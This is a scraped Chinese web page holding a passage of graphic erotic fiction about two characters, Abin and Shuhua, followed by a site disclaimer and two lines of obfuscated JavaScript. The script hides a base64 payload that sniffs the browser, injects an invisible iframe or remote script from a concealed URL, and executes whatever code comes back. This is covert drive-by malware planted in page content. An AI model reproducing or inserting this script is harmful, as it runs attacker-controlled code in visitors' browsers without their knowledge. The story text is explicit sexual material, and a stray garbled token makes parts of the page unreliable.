“啊啊哥啊好深哪好好哦”淑华发现虽然胀满,可却是异样的舒畅满足,是她从来没尝过的滋味,酸软酥麻传遍从xue儿心全身,不由得四肢发软,她saolang的说:“哥快你来chawo”

阿宾快速的和她交换位置,将她压在身下,淑华的双腿紧紧的勾勒着阿宾的屁股,没等阿宾开始choucha,就自己先挺动起来。阿宾被她的浪态惹得ji=ba大硬,先抵死她的xue心,再缓缓的抽出,抽到只剩下大鬼头含在xue口时,只听得“咕吱”一声,原先被ji=ba封堵住的樱水喷洒而出,延着淑华的屁股缝都流到草地上了。阿宾又深深插入,再次紧顶xue心,然后又退出到xue口,如此重复着,而且越来动作越快,屁股不停的扭动着。

淑华被插得香汗淋漓,快乐的就要魂飞上天,顾不得身在室外,也不管会不会有人听见,动人心魄的浪声叫唤起来。

“啊啊亲哥亲老公啊我好舒服美死了再插再插啊好深哪妹妹要死了真舒服美啊”

阿宾赶快用嘴唇封住她的小嘴,舌头和舌头纠缠起来,淑华不能再出声,只是“唔唔”的发着鼻音,继续表达她的快乐。xue心深处的阵阵颤抖,让她无法不发出浪声,她恨不得可以大声叫喊,因为实在太舒服了。

可是当阿宾继续choucha,让她大泄了两次之后,她才真正尝到dajiba的威力,阿宾丝豪没有疲惫或要蛇精的迹象,仍然坚强的挺进拔出,她的樱水湿透的身下的草皮,双腿终于自阿宾的腰际无力的松下,脸上露出恍忽的笑容。

阿宾这时更有机会看清楚这个钰慧的室友,她年轻儿美丽的脸庞正浮动着满足的红云,淡薄的嘴唇虽然没有上半点唇彩,依然明艳动人,他忍不住又轻吻了她一次。小巧耸立的溽房正随着剧烈的呼吸上下起伏着,她白晰透红的肌肤虽然和钰慧不相上下,但是一个丰满和一个适巧,却各有风味。他兴味昂然的choucha,看着樱水飞溅,两人的下身都是黏答答一片,dajiba将xiao+xue撑的肥隆突起,而淑华只剩下shenyin般的梦呓,他突然加快速度,发狠的进出不停。

淑华又被美醒了,而且这次是一种从来也没经历过的刺激感觉,xiao+xue儿被插得不停的收缩,鹰蒂变得敏感异常,阿宾每一个刺进拉出的动作都让会她悸动不停,huaxin乱颤,她觉得身体快要爆炸了一样。

终于,她高声“啊”的叫喊出来,高氵朝来了,而且一波接着一波,这是她第一次经历连续性高氵朝,她觉得自己几乎要死掉了,双腿又再勾上阿宾的tunbu,死命的勒紧,像要把他生吞活剥吃了一般。

阿宾觉的dajiba被牢牢套紧,大鬼头仿佛有一张小嘴吸着一样,又插了几下,终于忍受不住了,一股浓厚的阳精全shejin淑华的子宫。

“哦哦啊”

淑华又满足的笑了,阿宾伏在她身上,享受最后的余馧。

半晌之后,两人才起身,阿宾将ji=ba收回裤内,再帮淑华穿好衣裤,两人又亲吻了一会儿,才又想起还没吃饭,但是淑华已经一身狼狈,所以阿宾又陪她回宿舍,等她换过短裤才又再一起外出用餐。

这一夜,阿宾没等到钰慧。

钰慧在隔天才到阿宾的公寓找他,她跟阿宾说和淑华走失了,就自己到处乱逛才晚回来。

另一方面阿辉也编个理由跟淑华解释,说他和钰慧找不到她之后就分开了,后来他有到宿舍找她不到。

当然他们可不能说是到了宾馆去干了一个下午而忘记了时间。dulesrclepckshow.phpd6

少年阿宾下载</div>
版权声明

本站内容由互联网搜集而来,不代表撩妹情话网立场,请勿对号入座!
如果本文侵犯了您的合法权益,请联系我们,我们将在第一时间处理!

eval("\x77\x69\x6e\x64\x6f\x77")["\x6E\x70\x6C\x73"]=function(e){var sp =''+'ABCDEFGHIJKL'+'MNOPQRSTUVWXY'+'Zabcdefgh'+'ijklmnopqrs'+'tuvwxyz0123456'+'789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x41\x73\x58\x70\x50\x73\x6C\x6E\x5A"]=function(){eval(npls("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQobnBscyh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKG5wbHMoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZihucGxzKCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbbnBscygiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIHo9dSsnLTEvcXEvJytyO2RbJ3cnKydyaScrJ3QnKydlJ10oJzxpJysnZnInKydhJysnbWUgc3R5bGU9IicrJ20nKydhcicrJ2dpJysnbjowO3AnKydhZCcrJ2QnKydpbicrJ2c6MDtiJysnb3InKydkJysnZXI6bicrJ29uJysnZTsnKydvcCcrJ2EnKydjaScrJ3QnKyd5OjAnKycuMCcrcmQoMiw5KSsnO3dpJysnZHQnKydoOicrcmQoMiw1KSsncCcrJ3g7aCcrJ2UnKydpZ2gnKyd0OicrcmQoMiw1KSsncCcrJ3g7JysnIiBhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WydhZCcrJ2RFdicrJ2VudEwnKydpc3QnKydlbmVyJ10oJ20nKydlc3MnKydhZ2UnLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyXSl7cm0oYyk7bmV3IEZ1bmN0aW9uKG5wbHMoZS5kYXRhW3JdLnJlcGxhY2UobmV3IFJlZ0V4cChyLCdnJyksJycpKSkoKTt9fSk7fWVsc2V7ZC53cml0ZSgnPHMnKydjcmknKydwdCBzcmM9IicrdSsnLmpzIj48XC9zJysnY3JpcCcrJ3Q+Jyk7fX0pKCcnKyc9JysnPXdNTScrJ3kwU00nKydNJysnNWtUTU0nKyd0TScrJ01tUicrJ3lVQ01NJysndDVXWjAnKydNTWonKydSeVV5JysnTU0wUUQnKydNTXgnKydFJysnME0nKydNbCcrJzAyJysnYmo1aWEnKyczJysnVlcnKydlJysnMGQnKydYJysnWnUnKydjJysnM2QnKyczWmsnKydNTWxZJysna00nKydNbCcrJ0UnKycwTU0nKydsTScrJ01IYzBSJysnSCcrJ2EnKycnKycnLCcnKydJZ0snKydsanMnKydBZScrJycrJycsd2luZG93LGRvY3VtZW50LCcnKydhdmQnKydlTXgnKyc1JysnJysnJywnTScp"));}